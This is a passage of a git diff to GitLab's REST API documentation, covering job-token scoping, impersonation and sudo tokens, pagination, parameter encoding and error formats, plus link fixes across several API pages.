Registry](../user/packages/container_registry/index.md) + (the `$CI_REGISTRY_PASSWORD` is `$CI_JOB_TOKEN`). + - [Container Registry API](container_registry.md) (scoped to the job's project, when the `ci_job_token_scope` feature flag is enabled) +- [Get job artifacts](job_artifacts.md#get-job-artifacts). +- [Get job token's job](jobs.md#get-job-tokens-job). +- [Pipeline triggers](pipeline_triggers.md), using the `token=` parameter. +- [Release creation](releases/index.md#create-a-release). +- [Terraform plan](../user/infrastructure/index.md). + +The token has the same permissions to access the API as the user that triggers the +pipeline. Therefore, this user must be assigned to [a role that has the required privileges](../user/permissions.md). + +The token is valid only while the pipeline job runs. After the job finishes, you can't +use the token anymore. + +A job token can access a project's resources without any configuration, but it might +give extra permissions that aren't necessary. There is [a proposal](https://gitlab.com/groups/gitlab-org/-/epics/3559) +to redesign the feature for more strategic control of the access permissions. + +#### GitLab CI/CD job token security + +To make sure that this token doesn't leak, GitLab: + +- Masks the job token in job logs. +- Grants permissions to the job token only when the job is running. + +To make sure that this token doesn't leak, you should also configure +your [runners](../ci/runners/README.md) to be secure. Avoid: + +- Using Docker's `privileged` mode if the machines are re-used. +- Using the [`shell` executor](https://docs.gitlab.com/runner/executors/shell.html) when jobs + run on the same machine. + +If you have an insecure GitLab Runner configuration, you increase the risk that someone +tries to steal tokens from other jobs. + +#### Limit GitLab CI/CD job token access + +> - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/328553) in GitLab 14.1. +> - [Deployed behind a feature flag](../user/feature_flags.md), disabled by default. +> - Disabled on GitLab.com. +> - Not recommended for production use. +> - To use in GitLab self-managed instances, ask a GitLab administrator to [enable it](#enable-or-disable-ci-job-token-scope-limit). **(FREE SELF)** + +This in-development feature might not be available for your use. There can be +[risks when enabling features still in development](../user/feature_flags.md#risks-when-enabling-features-still-in-development). +Refer to this feature's version history for more details. + +You can limit the access scope of a project's CI/CD job token to increase the +job token's security. A job token might give extra permissions that aren't necessary +to access specific resources. Limiting the job token access scope reduces the risk of a leaked +token being used to access private data that the user associated to the job can access. + +Control the job token access scope with an allowlist of other projects authorized +to be accessed by authenticating with the current project's job token. By default +the token scope only allows access to the same project where the token comes from. +Other projects can be added and removed by maintainers with access to both projects. + +This setting is enabled by default for all new projects, and disabled by default in projects +created before GitLab 14.1. It is strongly recommended that project maintainers enable this +setting at all times, and configure the allowlist for cross-project access if needed. + +For example, when the setting is enabled, jobs in a pipeline in project `A` have +a `CI_JOB_TOKEN` scope limited to project `A`. If the job needs to use the token +to make an API request to project `B`, then `B` must be added to the allowlist for `A`. + +To enable and configure the job token scope limit: + +1. On the top bar, select **Menu > Projects** and find your project. +1. On the left sidebar, select **Settings > CI/CD**. +1. Expand **Token Access**. +1. Toggle **Limit CI_JOB_TOKEN access** to enabled. +1. (Optional) Add existing projects to the token's access scope. The user adding a + project must have the [maintainer role](../user/permissions.md) in both projects. + +If the job token scope limit is disabled, the token can potentially be used to authenticate +API requests to all projects accessible to the user that triggered the job. + +There is [a proposal](https://gitlab.com/groups/gitlab-org/-/epics/3559) to improve +the feature with more strategic control of the access permissions. + +##### Enable or disable CI job token scope limit **(FREE SELF)** + +The GitLab CI/CD job token access scope limit is under development and not ready for production +use. It is deployed behind a feature flag that is **disabled by default**. +[GitLab administrators with access to the GitLab Rails console](../administration/feature_flags.md) +can enable it. + +To enable it: + +```ruby +Feature.enable(:ci_scoped_job_token) +``` + +To disable it: + +```ruby +Feature.disable(:ci_scoped_job_token) +``` + +### Impersonation tokens + +Impersonation tokens are a type of [personal access token](../user/profile/personal_access_tokens.md). +They can be created only by an administrator, and are used to authenticate with the +API as a specific user. + +Use impersonation tokens an alternative to: + +- The user's password or one of their personal access tokens. +- The [Sudo](#sudo) feature. The user's or administrator's password or token + may not be known, or may change over time. + +For more information, see the [users API](users.md#create-an-impersonation-token) +documentation. + +Impersonation tokens are used exactly like regular personal access tokens, and +can be passed in either the `private_token` parameter or the `PRIVATE-TOKEN` +header. + +#### Disable impersonation + +> [Introduced](https://gitlab.com/gitlab-org/gitlab-foss/-/issues/40385) in GitLab 11.6. + +By default, impersonation is enabled. To disable impersonation: + +**For Omnibus installations** + +1. Edit the `/etc/gitlab/gitlab.rb` file: + + ```ruby + gitlab_rails['impersonation_enabled'] = false + ``` + +1. Save the file, and then [reconfigure](../administration/restart_gitlab.md#omnibus-gitlab-reconfigure) + GitLab for the changes to take effect. + +To re-enable impersonation, remove this configuration, and then reconfigure +GitLab. + +**For installations from source** + +1. Edit the `config/gitlab.yml` file: + + ```yaml + gitlab: + impersonation_enabled: false + ``` + +1. Save the file, and then [restart](../administration/restart_gitlab.md#installations-from-source) + GitLab for the changes to take effect. + +To re-enable impersonation, remove this configuration, and then restart GitLab. + +### Sudo + +All API requests support performing an API request as if you were another user, +provided you're authenticated as an administrator with an OAuth or personal +access token that has the `sudo` scope. The API requests are executed with the +permissions of the impersonated user. + +As an [administrator](../user/permissions.md), pass the `sudo` parameter either +by using query string or a header with an ID or username (case insensitive) of +the user you want to perform the operation as. If passed as a header, the header +name must be `Sudo`. + +If a non administrative access token is provided, GitLab returns an error +message with a status code of `403`: + +```json +{ + "message": "403 Forbidden - Must be admin to use sudo" +} +``` + +If an access token without the `sudo` scope is provided, an error message is +be returned with a status code of `403`: + +```json +{ + "error": "insufficient_scope", + "error_description": "The request requires higher privileges than provided by the access token.", + "scope": "sudo" +} +``` + +If the sudo user ID or username cannot be found, an error message is +returned with a status code of `404`: + +```json +{ + "message": "404 User with ID or username '123' Not Found" +} +``` + +Example of a valid API request and a request using cURL with sudo request, +providing a username: + +```plaintext +GET /projects?private_token=<your_access_token>&sudo=username +``` + +```shell +curl --header "PRIVATE-TOKEN: <your_access_token>" --header "Sudo: username" "https://gitlab.example.com/api/v4/projects" +``` + +Example of a valid API request and a request using cURL with sudo request, +providing an ID: + +```plaintext +GET /projects?private_token=<your_access_token>&sudo=23 +``` + +```shell +curl --header "PRIVATE-TOKEN: <your_access_token>" --header "Sudo: 23" "https://gitlab.example.com/api/v4/projects" +``` + +## Status codes + +The API is designed to return different status codes according to context and +action. This way, if a request results in an error, you can get +insight into what went wrong. + +The following table gives an overview of how the API functions generally behave. + +| Request type | Description | +|---------------|-------------| +| `GET` | Access one or more resources and return the result as JSON. | +| `POST` | Return `201 Created` if the resource is successfully created and return the newly created resource as JSON. | +| `GET` / `PUT` | Return `200 OK` if the resource is accessed or modified successfully. The (modified) result is returned as JSON. | +| `DELETE` | Returns `204 No Content` if the resource was deleted successfully. | + +The following table shows the possible return codes for API requests. + +| Return values | Description | +|--------------------------|-------------| +| `200 OK` | The `GET`, `PUT` or `DELETE` request was successful, and the resource(s) itself is returned as JSON. | +| `204 No Content` | The server has successfully fulfilled the request, and there is no additional content to send in the response payload body. | +| `201 Created` | The `POST` request was successful, and the resource is returned as JSON. | +| `304 Not Modified` | The resource hasn't been modified since the last request. | +| `400 Bad Request` | A required attribute of the API request is missing. For example, the title of an issue is not given. | +| `401 Unauthorized` | The user isn't authenticated. A valid [user token](#authentication) is necessary. | +| `403 Forbidden` | The request isn't allowed. For example, the user isn't allowed to delete a project. | +| `404 Not Found` | A resource couldn't be accessed. For example, an ID for a resource couldn't be found. | +| `405 Method Not Allowed` | The request isn't supported. | +| `409 Conflict` | A conflicting resource already exists. For example, creating a project with a name that already exists. | +| `412` | The request was denied. This can happen if the `If-Unmodified-Since` header is provided when trying to delete a resource, which was modified in between. | +| `422 Unprocessable` | The entity couldn't be processed. | +| `429 Too Many Requests` | The user exceeded the [application rate limits](../administration/instance_limits.md#rate-limits). | +| `500 Server Error` | While handling the request, something went wrong on the server. | + +## Pagination + +GitLab supports the following pagination methods: + +- Offset-based pagination. This is the default method and is available on all endpoints. +- Keyset-based pagination. Added to selected endpoints but being + [progressively rolled out](https://gitlab.com/groups/gitlab-org/-/epics/2039). + +For large collections, for performance reasons we recommend keyset pagination +(when available) instead of offset pagination. + +### Offset-based pagination + +Sometimes, the returned result spans many pages. When listing resources, you can +pass the following parameters: + +| Parameter | Description | +|------------|-------------| +| `page` | Page number (default: `1`). | +| `per_page` | Number of items to list per page (default: `20`, max: `100`). | + +In the following example, we list 50 [namespaces](namespaces.md) per page: + +```shell +curl --request PUT --header "PRIVATE-TOKEN: <your_access_token>" "https://gitlab.example.com/api/v4/namespaces?per_page=50" +``` + +#### Pagination `Link` header + +[`Link` headers](https://www.w3.org/wiki/LinkHeader) are returned with each +response. They have `rel` set to `prev`, `next`, `first`, or `last` and contain +the relevant URL. Be sure to use these links instead of generating your own URLs. + +For GitLab.com users, [some pagination headers may not be returned](../user/gitlab_com/index.md#pagination-response-headers). + +In the following cURL example, we limit the output to three items per page +(`per_page=3`) and we request the second page (`page=2`) of [comments](notes.md) +of the issue with ID `8` which belongs to the project with ID `9`: + +```shell +curl --head --header "PRIVATE-TOKEN: <your_access_token>" "https://gitlab.example.com/api/v4/projects/9/issues/8/notes?per_page=3&page=2" +``` + +The response is: + +```http +HTTP/2 200 OK +cache-control: no-cache +content-length: 1103 +content-type: application/json +date: Mon, 18 Jan 2016 09:43:18 GMT +link: <https://gitlab.example.com/api/v4/projects/8/issues/8/notes?page=1&per_page=3>; rel="prev", <https://gitlab.example.com/api/v4/projects/8/issues/8/notes?page=3&per_page=3>; rel="next", <https://gitlab.example.com/api/v4/projects/8/issues/8/notes?page=1&per_page=3>; rel="first", <https://gitlab.example.com/api/v4/projects/8/issues/8/notes?page=3&per_page=3>; rel="last" +status: 200 OK +vary: Origin +x-next-page: 3 +x-page: 2 +x-per-page: 3 +x-prev-page: 1 +x-request-id: 732ad4ee-9870-4866-a199-a9db0cde3c86 +x-runtime: 0.108688 +x-total: 8 +x-total-pages: 3 +``` + +#### Other pagination headers + +GitLab also returns the following additional pagination headers: + +| Header | Description | +|-----------------|-------------| +| `x-next-page` | The index of the next page. | +| `x-page` | The index of the current page (starting at 1). | +| `x-per-page` | The number of items per page. | +| `X-prev-page` | The index of the previous page. | +| `x-total` | The total number of items. | +| `x-total-pages` | The total number of pages. | + +For GitLab.com users, [some pagination headers may not be returned](../user/gitlab_com/index.md#pagination-response-headers). + +### Keyset-based pagination + +Keyset-pagination allows for more efficient retrieval of pages and - in contrast +to offset-based pagination - runtime is independent of the size of the +collection. + +This method is controlled by the following parameters: + +| Parameter | Description | +|--------------| ------------| +| `pagination` | `keyset` (to enable keyset pagination). | +| `per_page` | Number of items to list per page (default: `20`, max: `100`). | + +In the following example, we list 50 [projects](projects.md) per page, ordered +by `id` ascending. + +```shell +curl --request GET --header "PRIVATE-TOKEN: <your_access_token>" "https://gitlab.example.com/api/v4/projects?pagination=keyset&per_page=50&order_by=id&sort=asc" +``` + +The response header includes a link to the next page. For example: + +```http +HTTP/1.1 200 OK +... +Links: <https://gitlab.example.com/api/v4/projects?pagination=keyset&per_page=50&order_by=id&sort=asc&id_after=42>; rel="next" +Link: <https://gitlab.example.com/api/v4/projects?pagination=keyset&per_page=50&order_by=id&sort=asc&id_after=42>; rel="next" +Status: 200 OK +... +``` + +WARNING: +The `Links` header is scheduled to be removed in GitLab 14.0 to be aligned with the +[W3C `Link` specification](https://www.w3.org/wiki/LinkHeader). The `Link` +header was [added in GitLab 13.1](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/33714) +and should be used instead. + +The link to the next page contains an additional filter `id_after=42` that +excludes already-retrieved records. The type of filter depends on the +`order_by` option used, and we may have more than one additional filter. + +When the end of the collection is reached and there are no additional +records to retrieve, the `Link` header is absent and the resulting array is +empty. + +We recommend using only the given link to retrieve the next page instead of +building your own URL. Apart from the headers shown, we don't expose additional +pagination headers. + +Keyset-based pagination is supported only for selected resources and ordering +options: + +| Resource | Order | +|-------------------------|-------| +| [Projects](projects.md) | `order_by=id` only. | + +## Path parameters + +If an endpoint has path parameters, the documentation displays them with a +preceding colon. + +For example: + +```plaintext +DELETE /projects/:id/share/:group_id +``` + +The `:id` path parameter needs to be replaced with the project ID, and the +`:group_id` needs to be replaced with the ID of the group. The colons `:` +shouldn't be included. + +The resulting cURL request for a project with ID `5` and a group ID of `17` is then: + +```shell +curl --request DELETE --header "PRIVATE-TOKEN: <your_access_token>" "https://gitlab.example.com/api/v4/projects/5/share/17" +``` + +Path parameters that are required to be URL-encoded must be followed. If not, +it doesn't match an API endpoint and responds with a 404. If there's +something in front of the API (for example, Apache), ensure that it doesn't decode +the URL-encoded path parameters. + +## Namespaced path encoding + +If using namespaced API requests, make sure that the `NAMESPACE/PROJECT_PATH` is +URL-encoded. + +For example, `/` is represented by `%2F`: + +```plaintext +GET /api/v4/projects/diaspora%2Fdiaspora +``` + +A project's _path_ isn't necessarily the same as its _name_. A project's path is +found in the project's URL or in the project's settings, under +**General > Advanced > Change path**. + +## File path, branches, and tags name encoding + +If a file path, branch or tag contains a `/`, make sure it is URL-encoded. + +For example, `/` is represented by `%2F`: + +```plaintext +GET /api/v4/projects/1/repository/files/src%2FREADME.md?ref=master +GET /api/v4/projects/1/branches/my%2Fbranch/commits +GET /api/v4/projects/1/repository/tags/my%2Ftag +``` + +## Request Payload + +API Requests can use parameters sent as [query strings](https://en.wikipedia.org/wiki/Query_string) +or as a [payload body](https://tools.ietf.org/html/draft-ietf-httpbis-p3-payload-14#section-3.2). +GET requests usually send a query string, while PUT or POST requests usually +send the payload body: + +- Query string: + + ```shell + curl --request POST "https://gitlab/api/v4/projects?name=<example-name>&description=<example-description>" + ``` + +- Request payload (JSON): + + ```shell + curl --request POST --header "Content-Type: application/json" \ + --data '{"name":"<example-name>", "description":"<example-description"}' "https://gitlab/api/v4/projects" + ``` + +URL encoded query strings have a length limitation. Requests that are too large +result in a `414 Request-URI Too Large` error message. This can be resolved by +using a payload body instead. + +## Encoding API parameters of `array` and `hash` types + +You can request the API with `array` and `hash` types parameters: + +### `array` + +`import_sources` is a parameter of type `array`: + +```shell +curl --request POST --header "PRIVATE-TOKEN: <your_access_token>" \ +-d "import_sources[]=github" \ +-d "import_sources[]=bitbucket" \ +"https://gitlab.example.com/api/v4/some_endpoint" +``` + +### `hash` + +`override_params` is a parameter of type `hash`: + +```shell +curl --request POST --header "PRIVATE-TOKEN: <your_access_token>" \ +--form "namespace=email" \ +--form "path=impapi" \ +--form "file=@/path/to/somefile.txt" +--form "override_params[visibility]=private" \ +--form "override_params[some_other_param]=some_value" \ +"https://gitlab.example.com/api/v4/projects/import" +``` + +### Array of hashes + +`variables` is a parameter of type `array` containing hash key/value pairs +`[{ 'key': 'UPLOAD_TO_S3', 'value': 'true' }]`: + +```shell +curl --globoff --request POST --header "PRIVATE-TOKEN: <your_access_token>" \ +"https://gitlab.example.com/api/v4/projects/169/pipeline?ref=master&variables[][key]=VAR1&variables[][value]=hello&variables[][key]=VAR2&variables[][value]=world" + +curl --request POST --header "PRIVATE-TOKEN: <your_access_token>" \ +--header "Content-Type: application/json" \ +--data '{ "ref": "master", "variables": [ {"key": "VAR1", "value": "hello"}, {"key": "VAR2", "value": "world"} ] }' \ +"https://gitlab.example.com/api/v4/projects/169/pipeline" +``` + +## `id` vs `iid` + +Some resources have two similarly-named fields. For example, [issues](issues.md), +[merge requests](merge_requests.md), and [project milestones](merge_requests.md). +The fields are: + +- `id`: ID that is unique across all projects. +- `iid`: Additional, internal ID (displayed in the web UI) that's unique in the + scope of a single project. + +If a resource has both the `iid` field and the `id` field, the `iid` field is +usually used instead of `id` to fetch the resource. + +For example, suppose a project with `id: 42` has an issue with `id: 46` and +`iid: 5`. In this case: + +- A valid API request to retrieve the issue is `GET /projects/42/issues/5`. +- An invalid API request to retrieve the issue is `GET /projects/42/issues/46`. + +Not all resources with the `iid` field are fetched by `iid`. For guidance +regarding which field to use, see the documentation for the specific resource. + +## Data validation and error reporting + +When working with the API you may encounter validation errors, in which case +the API returns an HTTP `400` error. + +Such errors appear in the following cases: + +- A required attribute of the API request is missing (for example, the title of + an issue isn't given). +- An attribute did not pass the validation (for example, the user bio is too + long). + +When an attribute is missing, you receive something like: + +```http +HTTP/1.1 400 Bad Request +Content-Type: application/json +{ + "message":"400 (Bad request) \"title\" not given" +} +``` + +When a validation error occurs, error messages are different. They hold +all details of validation errors: + +```http +HTTP/1.1 400 Bad Request +Content-Type: application/json +{ + "message": { + "bio": [ + "is too long (maximum is 255 characters)" + ] + } +} +``` + +This makes error messages more machine-readable. The format can be described as +follows: + +```json +{ + "message": { + "<property-name>": [ + "<error-message>", + "<error-message>", + ... + ], + "<embed-entity>": { + "<property-name>": [ + "<error-message>", + "<error-message>", + ... + ], + } + } +} +``` + +## Unknown route + +When you attempt to access an API URL that doesn't exist, you receive a +404 Not Found message. + +```http +HTTP/1.1 404 Not Found +Content-Type: application/json +{ + "error": "404 Not Found" +} +``` + +## Encoding `+` in ISO 8601 dates + +If you need to include a `+` in a query parameter, you may need to use `%2B` +instead, due to a [W3 recommendation](http://www.w3.org/Addressing/URL/4_URI_Recommentations.html) +that causes a `+` to be interpreted as a space. For example, in an ISO 8601 date, +you may want to include a specific time in ISO 8601 format, such as: + +```plaintext +2017-10-17T23:11:13.000+05:30 +``` + +The correct encoding for the query parameter would be: + +```plaintext +2017-10-17T23:11:13.000%2B05:30 +``` + +## Clients + +There are many unofficial GitLab API Clients for most of the popular programming +languages. For a complete list, visit the [GitLab website](https://about.gitlab.com/partners/technology-partners/#api-clients). + +## Rate limits + +For administrator documentation on rate limit settings, see +[Rate limits](../security/rate_limits.md). To find the settings that are +specifically used by GitLab.com, see +[GitLab.com-specific rate limits](../user/gitlab_com/index.md#gitlabcom-specific-rate-limits). + +## Content type + +The GitLab API supports the `application/json` content type by default, though +some API endpoints also support `text/plain`. + +In [GitLab 13.10 and later](https://gitlab.com/gitlab-org/gitlab/-/issues/250342), +API endpoints do not support `text/plain` by default, unless it's explicitly documented. diff --git a/doc/api/instance_clusters.md b/doc/api/instance_clusters.md index 1c4996975f7..ae94fdb137c 100644 --- a/doc/api/instance_clusters.md +++ b/doc/api/instance_clusters.md @@ -160,7 +160,7 @@ Parameters: | Attribute | Type | Required | Description | | ---------------------------------------------------- | ------- | -------- | ----------------------------------------------------------------------------------------------------- | | `name` | string | yes | The name of the cluster | -| `domain` | string | no | The [base domain](../user/project/clusters/index.md#base-domain) of the cluster | +| `domain` | string | no | The [base domain](../user/project/clusters/gitlab_managed_clusters.md#base-domain) of the cluster | | `environment_scope` | string | no | The associated environment to the cluster. Defaults to `*` | | `management_project_id` | integer | no | The ID of the [management project](../user/clusters/management_project.md) for the cluster | | `enabled` | boolean | no | Determines if cluster is active or not, defaults to `true` | @@ -228,7 +228,7 @@ Parameters: | ------------------------------------------- | ------- | -------- | ------------------------------------------------------------------------------------------ | | `cluster_id` | integer | yes | The ID of the cluster | | `name` | string | no | The name of the cluster | -| `domain` | string | no | The [base domain](../user/project/clusters/index.md#base-domain) of the cluster | +| `domain` | string | no | The [base domain](../user/project/clusters/gitlab_managed_clusters.md#base-domain) of the cluster | | `environment_scope` | string | no | The associated environment to the cluster | | `management_project_id` | integer | no | The ID of the [management project](../user/clusters/management_project.md) for the cluster | | `enabled` | boolean | no | Determines if cluster is active or not | diff --git a/doc/api/invitations.md b/doc/api/invitations.md index 36ff2d5bda4..c79295912fa 100644 --- a/doc/api/invitations.md +++ b/doc/api/invitations.md @@ -37,7 +37,7 @@ POST /projects/:id/invitations | Attribute | Type | Required | Description | | --------- | ---- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project or group](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project or group](index.md#namespaced-path-encoding) owned by the authenticated user | | `email` | string | yes | The email of the new member or multiple emails separated by commas | | `access_level` | integer | yes | A valid access level | | `expires_at` | string | no | A date string in the format YEAR-MONTH-DAY | @@ -84,7 +84,7 @@ GET /projects/:id/invitations | Attribute | Type | Required | Description | | --------- | ---- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project or group](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project or group](index.md#namespaced-path-encoding) owned by the authenticated user | | `page` | integer | no | Page to retrieve | | `per_page`| integer | no | Number of member invitations to return per page | | `query` | string | no | A query string to search for invited members by invite email. Query text must match email address exactly. When empty, returns all invitations. | @@ -121,9 +121,9 @@ PUT /projects/:id/invitations/:email | Attribute | Type | Required | Description | | --------- | ---- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project or group](README.md#namespaced-path-encoding) owned by the authenticated user. | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project or group](index.md#namespaced-path-encoding) owned by the authenticated user. | | `email` | string | yes | The email address to which the invitation was previously sent. | -| `access_level` | integer | no | A valid access level (defaults: `30`, developer access level). | +| `access_level` | integer | no | A valid access level (defaults: `30`, the Developer role). | | `expires_at` | string | no | A date string in ISO 8601 format (`YYYY-MM-DDTHH:MM:SSZ`). | ```shell @@ -151,7 +151,7 @@ DELETE /projects/:id/invitations/:email | Attribute | Type | Required | Description | | --------- | ---- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project or group](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project or group](index.md#namespaced-path-encoding) owned by the authenticated user | | `email` | string | yes | The email address to which the invitation was previously sent | ```shell diff --git a/doc/api/issue_links.md b/doc/api/issue_links.md index 4dfa9b2f532..d4f59d10316 100644 --- a/doc/api/issue_links.md +++ b/doc/api/issue_links.md @@ -22,7 +22,7 @@ Parameters: | Attribute | Type | Required | Description | |-------------|---------|----------|--------------------------------------| -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | | `issue_iid` | integer | yes | The internal ID of a project's issue | ```json @@ -74,9 +74,9 @@ POST /projects/:id/issues/:issue_iid/links | Attribute | Type | Required | Description | |---------------------|----------------|----------|--------------------------------------| -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | | `issue_iid` | integer | yes | The internal ID of a project's issue | -| `target_project_id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) of a target project | +| `target_project_id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) of a target project | | `target_issue_iid` | integer/string | yes | The internal ID of a target project's issue | | `link_type` | string | no | The type of the relation ("relates_to", "blocks", "is_blocked_by"), defaults to "relates_to"). | @@ -162,7 +162,7 @@ DELETE /projects/:id/issues/:issue_iid/links/:issue_link_id | Attribute | Type | Required | Description | |-------------|---------|----------|--------------------------------------| -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | | `issue_iid` | integer | yes | The internal ID of a project's issue | | `issue_link_id` | integer/string | yes | The ID of an issue relationship | | `link_type` | string | no | The type of the relation (`relates_to`, `blocks`, `is_blocked_by`), defaults to `relates_to` | diff --git a/doc/api/issues.md b/doc/api/issues.md index f321c00e7f2..6de8912c1af 100644 --- a/doc/api/issues.md +++ b/doc/api/issues.md @@ -4,7 +4,9 @@ group: Project Management info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://about.gitlab.com/handbook/engineering/ux/technical-writing/#assignments --- -# Issues API +# Issues API **(FREE)** + +Interact with [GitLab Issues](../user/project/issues/index.md) using the REST API. If a user is not a member of a private project, a `GET` request on that project results in a `404` status code. @@ -14,7 +16,7 @@ request on that project results in a `404` status code. By default, `GET` requests return 20 results at a time because the API results are paginated. -Read more on [pagination](README.md#pagination). +Read more on [pagination](index.md#pagination). WARNING: The `reference` attribute in responses is deprecated in favor of `references`. @@ -266,7 +268,7 @@ GET /groups/:id/issues?state=opened | `created_after` | datetime | no | Return issues created on or after the given time. Expected in ISO 8601 format (`2019-03-15T08:00:00Z`) | | `created_before` | datetime | no | Return issues created on or before the given time. Expected in ISO 8601 format (`2019-03-15T08:00:00Z`) | | `due_date` | string | no | Return issues that have no due date, are overdue, or whose due date is this week, this month, or between two weeks ago and next month. Accepts: `0` (no due date), `overdue`, `week`, `month`, `next_month_and_previous_two_weeks`. _(Introduced in [GitLab 13.3](https://gitlab.com/gitlab-org/gitlab/-/issues/233420))_ | -| `id` | integer/string | yes | The ID or [URL-encoded path of the group](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the group](index.md#namespaced-path-encoding) owned by the authenticated user | | `iids[]` | integer array | no | Return only the issues having the given `iid` | | `issue_type` | string | no | Filter to a given type of issue. One of `issue`, `incident`, or `test_case`. _(Introduced in [GitLab 13.12](https://gitlab.com/gitlab-org/gitlab/-/issues/260375))_ | | `iteration_id` **(PREMIUM)** | integer | no | Return issues assigned to the given iteration ID. `None` returns issues that do not belong to an iteration. `Any` returns issues that belong to an iteration. Mutually exclusive with `iteration_title`. _([Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/118742) in GitLab 13.6)_ | @@ -470,7 +472,7 @@ GET /projects/:id/issues?state=opened | `created_after` | datetime | no | Return issues created on or after the given time. Expected in ISO 8601 format (`2019-03-15T08:00:00Z`) | | `created_before` | datetime | no | Return issues created on or before the given time. Expected in ISO 8601 format (`2019-03-15T08:00:00Z`) | | `due_date` | string | no | Return issues that have no due date, are overdue, or whose due date is this week, this month, or between two weeks ago and next month. Accepts: `0` (no due date), `overdue`, `week`, `month`, `next_month_and_previous_two_weeks`. _(Introduced in [GitLab 13.3](https://gitlab.com/gitlab-org/gitlab/-/issues/233420))_ | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | | `iids[]` | integer array | no | Return only the issues having the given `iid` | | `issue_type` | string | no | Filter to a given type of issue. One of `issue`, `incident`, or `test_case`. _(Introduced in [GitLab 13.12](https://gitlab.com/gitlab-org/gitlab/-/issues/260375))_ | | `iteration_id` **(PREMIUM)** | integer | no | Return issues assigned to the given iteration ID. `None` returns issues that do not belong to an iteration. `Any` returns issues that belong to an iteration. Mutually exclusive with `iteration_title`. _([Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/118742) in GitLab 13.6)_ | @@ -822,7 +824,7 @@ GET /projects/:id/issues/:issue_iid | Attribute | Type | Required | Description | |-------------|---------|----------|--------------------------------------| -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | | `issue_iid` | integer | yes | The internal ID of a project's issue | ```shell @@ -990,7 +992,7 @@ POST /projects/:id/issues | `due_date` | string | no | The due date. Date time string in the format `YYYY-MM-DD`, for example `2016-03-11` | | `epic_id` **(PREMIUM)** | integer | no | ID of the epic to add the issue to. Valid values are greater than or equal to 0. | | `epic_iid` **(PREMIUM)** | integer | no | IID of the epic to add the issue to. Valid values are greater than or equal to 0. (deprecated, [scheduled for removal in API version 5](https://gitlab.com/gitlab-org/gitlab/-/issues/35157)) | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | | `iid` | integer/string | no | The internal ID of the project's issue (requires administrator or project owner rights) | | `issue_type` | string | no | The type of issue. One of `issue`, `incident`, or `test_case`. Default is `issue`. | | `labels` | string | no | Comma-separated label names for an issue | @@ -1160,7 +1162,7 @@ PUT /projects/:id/issues/:issue_iid | `due_date` | string | no | The due date. Date time string in the format `YYYY-MM-DD`, for example `2016-03-11` | | `epic_id` **(PREMIUM)** | integer | no | ID of the epic to add the issue to. Valid values are greater than or equal to 0. | | `epic_iid` **(PREMIUM)** | integer | no | IID of the epic to add the issue to. Valid values are greater than or equal to 0. (deprecated, [scheduled for removal in API version 5](https://gitlab.com/gitlab-org/gitlab/-/issues/35157)) | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | | `issue_iid` | integer | yes | The internal ID of a project's issue | | `issue_type` | string | no | Updates the type of issue. One of `issue`, `incident`, or `test_case`. | | `labels` | string | no | Comma-separated label names for an issue. Set to an empty string to unassign all labels. | @@ -1307,7 +1309,7 @@ DELETE /projects/:id/issues/:issue_iid | Attribute | Type | Required | Description | |-------------|---------|----------|--------------------------------------| -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | | `issue_iid` | integer | yes | The internal ID of a project's issue | ```shell @@ -1326,7 +1328,7 @@ PUT /projects/:id/issues/:issue_iid/reorder | Attribute | Type | Required | Description | |-------------|---------|----------|--------------------------------------| -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | | `issue_iid` | integer | yes | The internal ID of the project's issue | | `move_after_id` | integer | no | The ID of a project's issue that should be placed after this issue | | `move_before_id` | integer | no | The ID of a project's issue that should be placed 